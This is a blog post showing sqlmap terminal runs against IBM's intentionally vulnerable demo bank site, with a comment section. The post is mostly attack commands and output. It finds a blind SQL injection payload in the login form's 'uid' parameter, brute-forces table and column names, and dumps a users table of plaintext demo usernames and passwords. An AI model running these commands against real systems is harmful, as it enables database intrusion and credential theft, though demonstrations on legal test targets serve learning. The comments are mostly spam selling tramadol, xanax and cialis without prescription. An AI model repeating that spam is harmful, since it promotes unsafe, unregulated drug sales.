IBM (Testfire) has a "damn" vulnerable web server at location:
http://demo.testfire.net/ made for LEGAL web assessment.
[~/Work/sqlmap/trunk/sqlmap] python sqlmap.py -u "http://demo.testfire.net/
bank/login.aspx" --data="uid=test&passw=test123&btnSubmit=Login" --flush-session
--level=3 --risk=3 --tables --threads=8 --batch
sqlmap/1.0-dev (r4002) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mu
tual consent can be considered as an illegal activity. it is the final user's re
sponsibility to obey all applicable local, state and federal laws. authors assum
e no liability and are not responsible for any misuse or damage caused by this p
rogram
[*] starting at: 15:45:54
[15:45:54] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/demo.tes
tfire.net/session' as session file
[15:45:54] [INFO] flushing session file
[15:45:54] [INFO] testing connection to the target url
[15:45:55] [INFO] heuristics detected web page charset 'ascii'
[15:45:55] [INFO] testing if the url is stable, wait a few seconds
[15:45:57] [INFO] url is stable
[15:45:57] [INFO] testing if POST parameter 'uid' is dynamic
[15:45:57] [WARNING] POST parameter 'uid' appears to be not dynamic
[15:45:58] [WARNING] heuristic test shows that POST parameter 'uid' might not be
injectable
[15:45:58] [INFO] testing sql injection on POST parameter 'uid'
[15:45:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:46:30] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[15:47:16] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ
L comment)'
[15:48:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Gene
ric comment)'
[15:48:07] [INFO] POST parameter 'uid' is 'OR boolean-based blind - WHERE or HAV
ING clause (Generic comment)' injectable
[15:48:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[15:48:08] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[15:48:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:48:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[15:48:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[15:48:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[15:48:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (utl_
inaddr.get_host_address)'
[15:48:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (ctxs
ys.drithsx.sn)'
[15:48:11] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[15:48:12] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[15:48:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[15:48:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[15:48:16] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[15:48:17] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
HAVING clause'
[15:48:18] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
HAVING clause (IN)'
[15:48:19] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLTy
pe)'
[15:48:20] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (utl_i
naddr.get_host_address)'
[15:48:22] [INFO] testing 'Firebird OR error-based - WHERE or HAVING clause'
[15:48:23] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[15:48:23] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:48:23] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[15:48:23] [INFO] testing 'Oracle error-based - Parameter replace'
[15:48:23] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:48:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[15:48:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:48:24] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[15:48:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:48:25] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[15:48:26] [INFO] testing 'Firebird stacked queries (heavy query)'
[15:48:27] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:48:27] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[15:48:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:48:28] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[15:48:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:48:29] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[15:48:30] [INFO] testing 'Oracle AND time-based blind'
[15:48:30] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[15:48:31] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[15:48:31] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[15:48:32] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[15:48:34] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav
y query)'
[15:48:35] [INFO] testing 'Oracle OR time-based blind'
[15:48:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:48:41] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[15:48:47] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[15:48:52] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[15:49:00] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[15:49:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:49:05] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[15:49:10] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns
'
[15:49:10] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[15:49:16] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[15:49:16] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[15:49:21] [INFO] testing 'Generic UNION query (random number) - 11 to 20 column
s'
[15:49:21] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[15:49:26] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[15:49:26] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[15:49:31] [INFO] checking if the injection point on POST parameter 'uid' is a f
alse positive
[15:49:34] [INFO] POST parameter 'uid' is vulnerable. Do you want to keep testin
g the others? [y/N] N
sqlmap identified the following injection points with a total of 340 HTTP(s) req
uests:
---
Place: POST
Parameter: uid
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
Payload: uid=-7539' OR NOT (8754=8754)-- &passw=test123&btnSubmit=Login
---
[15:49:34] [INFO] manual usage of POST payloads requires url encoding
[15:49:34] [INFO] testing MySQL
[15:49:35] [WARNING] the back-end DBMS is not MySQL
[15:49:35] [INFO] testing Oracle
[15:49:35] [WARNING] the back-end DBMS is not Oracle
[15:49:35] [INFO] testing PostgreSQL
[15:49:36] [WARNING] the back-end DBMS is not PostgreSQL
[15:49:36] [INFO] testing Microsoft SQL Server
[15:49:36] [WARNING] the back-end DBMS is not Microsoft SQL Server
[15:49:36] [INFO] testing SQLite
[15:49:37] [WARNING] the back-end DBMS is not SQLite
[15:49:37] [INFO] testing Microsoft Access
[15:49:37] [INFO] confirming Microsoft Access
[15:49:38] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
[15:49:38] [INFO] fetching tables for database: `Microsoft_Access_masterdb`
[15:49:38] [INFO] fetching number of tables for database '`Microsoft_Access_mast
erdb`'
[15:49:38] [INFO] retrieved:
[15:49:40] [WARNING] unable to retrieve the number of tables for database '`Micr
osoft_Access_masterdb`'
[15:49:40] [ERROR] cannot retrieve table names, back-end DBMS is Access
[15:49:40] [INFO] do you want to use common table existence check? [Y/n/q] Y
[15:49:40] [INFO] checking table existence using items from '/home/stamparm/Work
/sqlmap/trunk/sqlmap/txt/common-tables.txt'
[15:49:40] [INFO] adding words used on web page to the check list
[15:49:40] [INFO] starting 8 threads
[15:49:41] [INFO] retrieved: users
[15:49:44] [INFO] retrieved: accounts
[15:50:22] [INFO] retrieved: transactions
[15:51:00] [INFO] tried 1018/3168 items (32%)^C
[15:51:00] [WARNING] user aborted during common table existence check. sqlmap wi
ll display some tables only
Database: Microsoft_Access_masterdb
[3 tables]
+--------------+
| accounts |
| transactions |
| users |
+--------------+
[15:51:02] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 1209 times
[15:51:02] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s
qlmap/trunk/sqlmap/output/demo.testfire.net'
[*] shutting down at: 15:51:02
[~/Work/sqlmap/trunk/sqlmap] python sqlmap.py -u "http://demo.testfire.net/bank/
login.aspx" --data="uid=test&passw=test123&btnSubmit=Login" --columns -T users -
-threads=8 --batch
sqlmap/1.0-dev (r4002) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mu
tual consent can be considered as an illegal activity. it is the final user's re
sponsibility to obey all applicable local, state and federal laws. authors assum
e no liability and are not responsible for any misuse or damage caused by this p
rogram.
[*] starting at: 15:51:30
[15:51:30] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/demo.tes
tfire.net/session' as session file
[15:51:30] [INFO] resuming injection data from session file
[15:51:30] [INFO] resuming back-end DBMS 'microsoft access' from session file
[15:51:30] [INFO] resuming brute forced table name 'users' from session file
[15:51:30] [INFO] resuming brute forced table name 'transactions' from session f
ile
[15:51:30] [INFO] testing connection to the target url
[15:51:31] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: uid
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
Payload: uid=-7539' OR NOT (8754=8754)-- &passw=test123&btnSubmit=Login
---
[15:51:31] [INFO] manual usage of POST payloads requires url encoding
[15:51:31] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
[15:51:31] [ERROR] cannot retrieve column names, back-end DBMS is Access
[15:51:31] [INFO] do you want to use common columns existence check? [Y/n/q] Y
[15:51:31] [INFO] checking column existence using items from '/home/stamparm/Wor
k/sqlmap/trunk/sqlmap/txt/common-columns.txt'
[15:51:31] [INFO] starting 8 threads
[15:51:34] [INFO] retrieved: first_name
[15:51:34] [INFO] retrieved: username
[15:51:35] [INFO] retrieved: userid
[15:51:42] [INFO] retrieved: last_name
[15:51:46] [INFO] retrieved: password
[15:52:14] [INFO] tried 558/2442 items (23%)^C
[15:52:14] [WARNING] user aborted during common column existence check. sqlmap w
ill display some columns only
Database: `Microsoft_Access_masterdb`
Table: users
[5 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| first_name | non-numeric |
| last_name | non-numeric |
| password | non-numeric |
| userid | numeric |
| username | non-numeric |
+------------+-------------+
[15:52:17] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 558 times
[15:52:17] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s
qlmap/trunk/sqlmap/output/demo.testfire.net'
[*] shutting down at: 15:52:17
[16] Tue 31.May.2011 15:52:17
[~/Work/sqlmap/trunk/sqlmap] python sqlmap.py -u "http://demo.testfire.net/bank/
login.aspx" --data="uid=test&passw=test123&btnSubmit=Login" --dump -C userid,use
rname,password -T users --threads=8 --batch
sqlmap/1.0-dev (r4002) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mu
tual consent can be considered as an illegal activity. it is the final user's re
sponsibility to obey all applicable local, state and federal laws. authors assum
e no liability and are not responsible for any misuse or damage caused by this p
rogram.
[*] starting at: 15:52:36
[15:52:36] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/demo.tes
tfire.net/session' as session file
[15:52:36] [INFO] resuming injection data from session file
[15:52:36] [INFO] resuming back-end DBMS 'microsoft access' from session file
[15:52:36] [INFO] resuming brute forced table name 'users' from session file
[15:52:36] [INFO] resuming brute forced table name 'transactions' from session f
ile
[15:52:36] [INFO] resuming brute forced column name 'first_name' for table 'user
s' from session file
[15:52:36] [INFO] resuming brute forced column name 'username' for table 'users'
from session file
[15:52:36] [INFO] resuming brute forced column name 'userid' for table 'users'
from session file
[15:52:36] [INFO] resuming brute forced column name 'last_name' for table 'users
' from session file
[15:52:36] [INFO] resuming brute forced column name 'password' for table 'users'
from session file
[15:52:36] [INFO] testing connection to the target url
[15:52:37] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: uid
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
Payload: uid=-7539' OR NOT (8754=8754)-- &passw=test123&btnSubmit=Login
---
[15:52:37] [INFO] manual usage of POST payloads requires url encoding
[15:52:37] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
[15:52:37] [ERROR] cannot retrieve column names, back-end DBMS is Access
[15:52:37] [INFO] fetching column(s) 'username, password, userid' entries for ta
ble 'users' on database 'Microsoft_Access_masterdb'
[15:52:37] [INFO] fetching number of columns 'username, password, userid' entrie
s for table 'users' on database 'Microsoft_Access_masterdb'
[15:52:37] [INFO] retrieved: 6
[15:52:42] [INFO] fetching number of distinct values for column 'userid'
[15:52:42] [INFO] retrieved: 6
[15:52:50] [INFO] using column 'userid' as a pivot for retrieving row data
[15:52:50] [INFO] retrieving the length of query output
[15:52:50] [INFO] retrieved: 1
[15:52:54] [INFO] retrieved: 1
[15:53:02] [INFO] retrieving the length of query output
[15:53:02] [INFO] retrieved: 5
[15:53:15] [INFO] retrieved: admin
[15:53:15] [INFO] retrieving the length of query output
[15:53:15] [INFO] retrieved: 5
[15:53:30] [INFO] retrieved: admin
[15:53:30] [INFO] retrieving the length of query output
[15:53:30] [INFO] retrieved: 9
[15:53:49] [INFO] retrieved: 100116013
[15:53:49] [INFO] retrieving the length of query output
[15:53:49] [INFO] retrieved: 4
[15:54:00] [INFO] retrieved: sjoe
[15:54:00] [INFO] retrieving the length of query output
[15:54:00] [INFO] retrieved: 7
[15:54:16] [INFO] retrieved: frazier
[15:54:16] [INFO] retrieving the length of query output
[15:54:16] [INFO] retrieved: 9
[15:54:35] [INFO] retrieved: 100116014
[15:54:35] [INFO] retrieving the length of query output
[15:54:35] [INFO] retrieved: 6
[15:54:50] [INFO] retrieved: jsmith
[15:54:50] [INFO] retrieving the length of query output
[15:54:50] [INFO] retrieved: 8
[15:55:11] [INFO] retrieved: Demo1234
[15:55:11] [INFO] retrieving the length of query output
[15:55:11] [INFO] retrieved: 9
[15:55:31] [INFO] retrieved: 100116015
[15:55:31] [INFO] retrieving the length of query output
[15:55:31] [INFO] retrieved: 5
[15:55:44] [INFO] retrieved: cclay
[15:55:44] [INFO] retrieving the length of query output
[15:55:44] [INFO] retrieved: 3
[15:55:55] [INFO] retrieved: Ali
[15:55:55] [INFO] retrieving the length of query output
[15:55:55] [INFO] retrieved: 9
[15:56:14] [INFO] retrieved: 100116018
[15:56:14] [INFO] retrieving the length of query output
[15:56:14] [INFO] retrieved: 6
[15:56:30] [INFO] retrieved: sspeed
[15:56:30] [INFO] retrieving the length of query output
[15:56:30] [INFO] retrieved: 8
[15:56:47] [INFO] retrieved: Demo1234
[15:56:47] [INFO] retrieving the length of query output
[15:56:47] [INFO] retrieved: 1
[15:56:50] [INFO] retrieved: 2
[15:56:58] [INFO] retrieving the length of query output
[15:56:58] [INFO] retrieved: 5
[15:57:10] [INFO] retrieved: tuser
[15:57:10] [INFO] retrieving the length of query output
[15:57:10] [INFO] retrieved: 5
[15:57:23] [INFO] retrieved: tuser
Database: Microsoft_Access_masterdb
Table: users
[6 entries]
+----------+-----------+----------+
| password | userid | username |
+----------+-----------+----------+
| admin | 1 | admin |
| frazier | 100116013 | sjoe |
| Demo1234 | 100116014 | jsmith |
| Ali | 100116015 | cclay |
| Demo1234 | 100116018 | sspeed |
| tuser | 2 | tuser |
+----------+-----------+----------+
[15:57:23] [INFO] Table 'Microsoft_Access_masterdb.users' dumped to CSV file '/h
ome/stamparm/Work/sqlmap/trunk/sqlmap/output/demo.testfire.net/dump/Microsoft_Ac
cess_masterdb/users.csv'
[15:57:23] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 470 times
[15:57:23] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s
qlmap/trunk/sqlmap/output/demo.testfire.net'
[*] shutting down at: 15:57:23
53 comments:
thx please cant sqlmap copy the Microsoft_Access_masterdb to the local disk f yes what are the commands for that
Ahaa, its fastidious conversation regarding this paragraph at this place at this web site, I
have read all that, so at this time me also commenting at this place.
Also see my webpage > forja
You really make it appear really easy along with your presentation but I find this topic to
be really something that I feel I would never understand.
It kind of feels too complicated and very wide
for me. I am taking a look forward in your subsequent submit, I'll attempt to get the dangle of it!
My web site ; Instalación geotermia en Madrid
xanax without prescription xanax side effects 1 mg - xanax generic identification
tramadol 100mg tramadol 100mg used - buy tramadol medication
buy tramadol online buy tramadol online no prescription mastercard - tramadol buy online florida
buy tramadol online purchase tramadol online no prescription - maximum dosage tramadol 50mg
buy carisoprodol carisoprodol detection drug test - carisoprodol online overnight
cheap tramadol online tramadol 50mg usa - buy tramadol online us pharmacy
xanax generic xanax dosage 120 lbs - buy xanax online with no prescription needed
buy tramadol online tramadol withdrawal duration - buy tramadol overnight no prescription
generic xanax side effects yellow xanax bars - green xanax pills s 902
carisoprodol 350 mg listaflex carisoprodol 350 mg para sirve - carisoprodol price
buy tramadol online many tramadol 50mg get high - can you buy tramadol internet
buy tramadol online tramadol hcl 50 mg para que sirve - tramadol hcl 50 mg webmd
buy cialis online buy cialis online ireland - cialis online order
buy cialis online buy generic cialis online usa - where to buy cialis online
xanax online xanax drug sleep - xanax side effects weight
buy tramadol online tramadol 50 mg purchase - tramadol ingredients side effects
buy generic cialis online no prescription generic cialis 20mg tablets - buy cialis online malaysia
cialis online buy cialis from us - generic cialis bangkok
cialis online buy cialis in south africa - cialis 5 mg daily review
buy cialis online can you buy cialis online in australia - can you buy cialis in hong kong
cialis online buy cialis online paypal - low dose cialis reviews
buy cialis online cialis daily use - cialis price in us
cialis online generic cialis goedkoop - cialis price walmart pharmacy
cialis online cialis dose - generic cialis tadalafil 20mg reviews
buy tramadol online tramadol for sale online no prescription - buy 200 mg tramadol online
learn how to buy tramdadol order tramadol online legally - tramadol 150 mg dose
http://landvoicelearning.com/#23561 where should i buy tramadol from online - tramadol and high
buy tramadol buy tramadol no prescription 100 mg - need purchase tramadol
http://landvoicelearning.com/#97734 can you order tramadol online legally - tramadol for dogs tablets
buy tramadol tramadol 50 mg a normal dose - tramadol x 225
buy tramadol online cheap tramadol overnight no prescription - buy tramadol online from usa
http://landvoicelearning.com/#30896 tramadol 50 mg withdrawal - tramadol 50 mg recommended dosage
http://blog.dawn.com/dblog/buy/#91875 effects of tramadol high - tramadol vs hydrocodone
http://buytramadolonlinecool.com/#73892 buy tramadol overnight delivery - buy tramadol 6914
buy tramadol online tramadol 50 mg how many - tramadol hcl 50 mg efectos secundarios
http://landvoicelearning.com/#44827 tramadol generic ultram 50 mg 180 pills - amneal tramadol ingredients
http://landvoicelearning.com/#63987 tramadol 50mg street - buy tramadol visa
buy ativan online ativan overdose in the elderly - ativan side effects burning sensation
buy ativan online ativan side effects dry mouth - xanax ativan overdose
buy tramadol online does tramadol 50 mg do you - purchase tramadol no prescription
order xanax no prescription buy xanax amsterdam - boost your xanax high
buy tramadol online tramadol 50mg get you high - tramadol buy australia
where can i order xanax online xanax and alcohol reaction - xanax dosage before flight
buy xanax online does xanax show up home drug test - xanax dosage erowid
buy xanax online buy xanax online no membership - xanax overdose can kill you
buy xanax online alternatives to xanax for anxiety - xanax withdrawal last
Xanax is shit
http://ranchodelastortugas.com/#61301 xanax dosage intervals - buy xanax online discover card
http://bayshorechryslerjeep.com/#3880 dose of xanax for anxiety - xanax side effects mayo
buy xanax online xanax drug name - xanax quotes for myspace
Post a Comment